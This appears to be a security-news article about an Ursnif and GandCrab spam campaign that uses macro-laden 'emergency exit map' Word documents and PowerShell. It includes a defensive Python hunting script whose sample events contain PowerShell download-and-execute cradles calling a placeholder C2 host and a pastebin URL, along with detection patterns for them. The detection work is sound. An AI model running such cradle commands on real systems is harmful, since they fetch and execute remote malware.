Spam campaigns are used to spread the Ursnif data stealer and GandCrab ransomware
Security researchers from the Carbon Black ThreatSight team have recently identified a new wave of the Ursnif trojan that uses PowerShell to evade detection and steal victims' personal data. More importantly, some of the attacks deliver not only this data stealer but also the well-known GandCrab ransomware. The company has found at least 180 variants of this particular malware campaign in the wild.
To compromise the system, the campaign relies on a familiar phishing tactic: the victim is asked to enable embedded macros. Once the macros in the Word document are enabled, a PowerShell script is launched and uses several techniques to download Ursnif and GandCrab variants:
The overall attack leverages several different approaches, which are popular techniques amongst red teamers, espionage-focused adversaries and large-scale criminal campaigns.
The main functionality of the Ursnif trojan campaign
The attack begins when an email carrying a Word document is sent to the user. The document contains malicious macros that launch a script when enabled. Once launched, the PowerShell command downloads the malware. The PowerShell script used by Ursnif fetches the main payload from a hard-coded command-and-control (C&C) server and executes it directly in the memory of the affected device, without writing it to disk.
In addition, the script retrieves a raw paste from pastebin.com that delivers GandCrab 5.0.4 ransomware. GandCrab is a notorious file-encrypting ransomware family that has made a name for itself over the past year. Decryption tools have been developed for many of its versions, but the variant used in the Ursnif campaign is one of the newer releases and cannot be decrypted yet. There has been speculation that this malware is being sold on the dark web, but the ransomware's operators have denied these claims.
Another report on this campaign shows that Ursnif not only runs its malicious code directly in memory but also persists as fileless malware. Because Ursnif's main goal is to take over personal data, it uses encrypted HTTPS connections to reach the command-and-control servers where the stolen data is collected. This tactic prevents data-loss-prevention (DLP) solutions from inspecting the content of the malicious traffic.
According to the researchers, the data loss is even harder to stop because the stolen data is also compressed, among other distinctive features. The Cisco Talos report states the following:
Ursnif is a fan of ‘fileless’ persistence which makes it difficult for traditional anti-virus techniques to filter out the C2 traffic from normal traffic.
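The infection chain described above (a Word macro spawning PowerShell, which pulls a script from a hard-coded server or a paste site and runs it in memory) leaves a characteristic trace in process-creation telemetry even when nothing touches disk. The following Python is an added example, not code from the article, Carbon Black or Cisco Talos: it scores Sysmon Event ID 1 style records for an Office parent launching a script host with download-cradle flags, and decodes any -EncodedCommand argument so the hidden script can be inspected too. The sample records, command lines and URLs are constructed for the example, and the indicator list is generic PowerShell tradecraft, not indicators published for this campaign.

```python
"""Hunt for Office -> PowerShell in-memory download chains in process-creation logs.

Added example; the events below are constructed to look like Sysmon Event ID 1
records and contain no real campaign artefacts.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Generic download-cradle / in-memory execution indicators (assumed tradecraft,
# not an indicator list from the article).
INDICATORS = [
    (re.compile(r"downloadstring|downloadfile", re.I), "remote content fetched by WebClient"),
    (re.compile(r"net\.webclient|invoke-webrequest|\biwr\b", re.I), "download cradle object"),
    (re.compile(r"invoke-expression|\biex\b", re.I), "script executed in memory"),
    (re.compile(r"-nop\b|-noprofile", re.I), "profile suppressed"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"pastebin\.com/raw", re.I), "paste site used as stage host"),
]
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str) -> str:
    """Build the base64 (UTF-16LE) form PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> dict:
    """Score one process-creation record; severity is high when an Office
    parent spawns a script host AND the command line carries cradle indicators."""
    parent, image = _basename(event["ParentImage"]), _basename(event["Image"])
    chain = parent in OFFICE_PARENTS and image in SCRIPT_HOSTS
    findings = [f"{parent} spawned {image}"] if chain else []
    decoded = decode_encoded_command(event["CommandLine"])
    hits = ["command passed via -EncodedCommand"] if decoded is not None else []
    # Inspect the visible command line and the decoded script together.
    text = event["CommandLine"] + " " + (decoded or "")
    hits += [why for pat, why in INDICATORS if pat.search(text)]
    severity = "high" if chain and hits else "medium" if chain or hits else "none"
    return {"ProcessId": event["ProcessId"], "severity": severity,
            "findings": findings + hits, "decoded": decoded}


def hunt(events) -> list:
    """Return only the records that raised an alert, worst first."""
    rank = {"high": 0, "medium": 1}
    alerts = [a for a in map(analyze, events) if a["severity"] != "none"]
    return sorted(alerts, key=lambda a: rank[a["severity"]])


# Constructed sample telemetry (placeholder hosts, no real campaign data).
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": WORD, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://c2.example.invalid/a')\""},
    {"ProcessId": 4188, "ParentImage": WORD, "Image": PS,
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_command(STAGE2)},
    {"ProcessId": 5020, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -Command Get-ChildItem C:\\Users"},
    {"ProcessId": 5100, "ParentImage": WORD, "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "C:\\Windows\\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["ProcessId"], alert["severity"], "; ".join(alert["findings"]))
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

The two Word-spawned records come back as high-severity alerts and the interactive Explorer-launched shell and the print spooler child are ignored; the decoded -EncodedCommand text is what an analyst would pivot on next, since the visible command line alone hides the staging URL.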
A closer look at the virus carrier — spam email campaign
The malware reaches the target system mainly through email messages that pretend to deliver an emergency map for the recipient's building. Instead of a map, the email carries a malicious attachment that installs the infection from a remote server once the victim is tricked into enabling macros.
Most of these emails claim to come from Rosie L. Ashton, and the subject line reads “Up to date emergency exit map.” The attachment is a Word document named Emergencyexitmap.doc, and the message body reads:
Please find below the Up to date emergency exit map.
Please see Emergency exit map in the attachment..
Rosei L. Ashton,
When the attachment is opened, the victim sees only the phrase “Emergency exit map” and a prompt to enable macros. Once macros are enabled, they execute the previously mentioned PowerShell script, which installs GandCrab ransomware. A file named putty.exe is the primary payload; it encrypts data on the device and marks the encrypted files. Like previous variants, it drops a ransom note with the payment demand and instructions on how to pay. Paying, however, does not guarantee that the files will be recovered.